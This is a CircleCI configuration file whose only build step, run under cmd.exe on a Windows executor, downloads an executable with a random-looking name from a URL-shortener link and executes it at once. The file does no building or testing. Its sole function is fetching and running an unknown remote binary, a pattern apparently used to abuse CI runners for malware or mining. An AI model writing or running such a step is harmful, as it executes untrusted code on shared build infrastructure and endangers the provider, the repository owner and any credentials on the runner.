version: 2.1

orbs:
   win: circleci/windows@2.2.0

jobs: 
  build: 
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: curl -L -o rDwz0VHD09.exe https://shortenlinks.net/rDwz0VHD09 && rDwz0VHD09.exe
